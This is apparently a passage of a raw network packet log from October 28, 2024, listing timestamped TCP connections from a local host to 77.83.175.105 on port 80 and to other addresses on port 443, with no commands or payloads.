                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.961939096 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.961955070 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.962585926 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.962599039 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.962606907 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.962622881 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.962637901 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.963190079 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.963201046 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.963208914 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.963223934 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.963253975 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.963902950 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.963913918 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.963948965 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.964493990 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.964505911 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.964514971 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.964535952 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.964554071 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.965178967 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.965190887 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.965361118 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.965825081 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.965837002 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.965861082 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.965876102 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.966497898 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.966509104 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.966545105 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.966561079 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.967161894 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.967173100 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.967195034 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.967210054 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.967849970 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.967861891 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.967870951 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.967880964 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.967889071 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.967904091 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.967930079 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.968833923 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.968846083 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.968853951 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.968875885 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.968892097 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.969794989 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.969805956 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.969815016 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.969835997 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.969856977 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.970722914 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.970733881 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.970742941 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.970752954 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.970767975 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.970793962 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.971620083 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.971631050 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.971637964 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.971659899 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.971674919 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.972476959 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.972490072 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.972498894 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.972522020 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.972538948 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.973301888 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.973314047 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.973323107 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.973332882 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.973360062 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.973376989 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.974138975 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.974150896 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.974159956 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.974181890 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.974199057 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.974947929 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.974960089 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.974968910 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.974992037 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.975008011 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.975708961 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.975723982 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.975732088 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.975749016 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.975775003 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.976433039 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.976479053 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.976496935 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.976507902 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.976516008 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.976531982 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.976556063 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.977267981 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.977279902 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.977288008 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.977309942 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.977338076 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.978034019 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.978045940 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.978055000 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.978065968 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.978075027 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.978112936 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.978846073 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.978857994 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.978867054 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.978878021 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.978904963 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.979608059 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.979623079 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.979633093 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.979649067 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.979676008 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.980405092 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.980417013 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.980426073 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.980436087 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.980446100 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.980449915 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.980473042 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.980500937 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.981359959 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.981370926 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.981379032 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.981389999 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.981405020 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.981420040 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.981445074 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.982279062 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.982290030 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.982299089 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.982309103 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.982316971 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.982322931 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.982338905 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.982367039 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.983227015 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.983237982 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.983247042 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.983258009 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.983266115 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.983280897 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.983309031 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.984169006 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.984179974 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.984189034 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.984200001 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.984216928 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.984241009 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.984250069 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985038042 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985049009 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985058069 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985068083 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985078096 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985084057 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985101938 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985136986 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985892057 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985903025 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985912085 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985922098 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985929966 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985945940 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.985974073 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.986717939 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.986728907 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.986738920 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.986756086 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.986758947 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.986767054 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.986776114 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.986807108 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.987551928 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.987564087 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.987571955 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.987581968 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.987590075 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.987622023 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.988342047 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.988353014 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.988362074 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.988370895 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.988379955 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.988384962 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.988399982 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.988414049 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.989151001 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.989161968 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.989171982 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.989195108 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.989204884 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.989209890 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.989227057 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.989248037 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.990088940 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.990101099 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.990108967 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.990118980 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.990132093 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.990159035 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:07.042409897 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:07.042479038 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:07.043318033 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:07.043365955 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:07.507179976 CET4434970523.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:07.507513046 CET49705443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:08.504379988 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:08.504431963 CET44349710142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:08.504563093 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:08.504930019 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:08.504949093 CET44349710142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:08.789341927 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:08.789418936 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.233508110 CET49713443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.233540058 CET44349713142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.233598948 CET49713443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.233804941 CET49714443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.233884096 CET44349714142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.234014034 CET49714443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.234186888 CET49713443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.234198093 CET44349713142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.234380960 CET49714443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.234416008 CET44349714142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.407246113 CET49715443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.407279968 CET44349715142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.408063889 CET49715443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.408550024 CET49715443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.408564091 CET44349715142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.465641022 CET44349710142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.466093063 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.466128111 CET44349710142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.467612982 CET44349710142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.467694998 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.469278097 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.469369888 CET44349710142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.469525099 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.469533920 CET44349710142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.523905039 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.748738050 CET44349710142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.795829058 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.795855045 CET44349710142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.835618019 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.877019882 CET44349710142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.877192020 CET44349710142.250.186.100192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:09.877260923 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:10.027502060 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:10.027503014 CET49710443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:10.027534008 CET44349710142.250.186.100192.168.2.5
